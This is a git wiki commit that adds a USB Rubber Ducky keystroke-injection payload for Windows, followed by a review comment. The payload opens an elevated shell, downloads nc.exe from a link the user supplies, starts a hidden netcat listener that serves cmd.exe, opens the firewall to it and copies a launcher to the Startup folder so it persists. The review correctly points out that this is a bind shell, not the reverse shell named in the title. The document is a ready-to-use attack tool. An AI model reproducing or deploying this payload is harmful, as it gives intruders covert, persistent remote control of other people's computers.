Created Payload Netcat Reverse Shell (markdown)

Arion 2016-12-17 13:36:23 +05:30
parent 4d009a6f37
commit 8bb221a3db
1 changed files with 82 additions and 0 deletions


@ -0,0 +1,82 @@
### **Change the following details**:
* **[NETCAT_DOWNLOAD_LINK]**: Your Netcat download link.
* **[PORT]**: The port on the target machine you want netcat to listen on.
* **Directory**: Use something other than %TEMP% if you want to.
## **CODE**:
```
REM Title: Netcat Reverse Shell
REM Author: Kanishk Singh
REM Version: 1
REM Description:
DELAY 200
REM --> Minimize all windows
WINDOWS d
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb RunAs
ENTER
DELAY 1500
ALT y
DELAY 500
STRING cd %TEMP%
ENTER
REM --> Kills already running Netcat instance (if any)
STRING TASKKILL /im nc.exe /f
ENTER
REM --> Delete nc.exe file if it already exists
STRING erase /Q nc.exe
ENTER
REM --> Delete Start batch file if it already exists
STRING erase /Q Start.bat
ENTER
REM --> Delete Invisible.vbs in temp folder, if it already exists
STRING erase /Q invisible.vbs
ENTER
REM --> Delete invisible.vbs file in Startup if it already exists
STRING erase /Q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\invisible.vbs"
ENTER
DELAY 500
REM --> Downloads NetCat
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://[NETCAT_DOWNLOAD_LINK]/nc.exe','nc.exe')
ENTER
DELAY 500
REM --> Creates a batch file to start listening
STRING copy con Start.bat
ENTER
STRING nc -lp [PORT] -vv -e cmd.exe -L
ENTER
CONTROL z
ENTER
REM --> Starts batch file invisibly
STRING copy con invisible.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell" )
ENTER
STRING WshShell.Run chr(34) & "%TEMP%\Start.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CONTROL z
ENTER
REM --> Add netcat to allowed programs list, enabling it to communicate through the firewall seamlessly
STRING netsh advfirewall firewall add rule name="Netcat" dir=in action=allow program="%TEMP%\nc.exe" enable=yes
ENTER
STRING start invisible.vbs
ENTER
DELAY 100
REM --> Copies invisible.vbs to startup folder for persistence
STRING copy "invisible.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
ENTER
REM --> Kills CMD while nc.exe continues running in background, remove Ducky after CMD closes
STRING exit
ENTER
```
## **To-Do**:
* Test whether the script executes at startup.
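Review bot: The naming in this file is inconsistent with what the payload actually does, and the `REM Description:` line is left empty. The listener line `nc -lp [PORT] -vv -e cmd.exe -L` makes netcat listen on the target and hand out cmd.exe to whoever connects in, which is a bind shell, not a reverse shell; the `[PORT]` bullet ("the port on the target machine you want netcat to listen on") and the inbound `dir=in` firewall rule agree with that, while the title, `REM Title:` and the commit message all say "Reverse Shell". Either rename the payload or correct the header and the `[PORT]` description so readers can classify the behaviour correctly, and fill in the description with a one-line summary of the steps (download, listener batch file, VBS launcher, firewall rule, Startup copy).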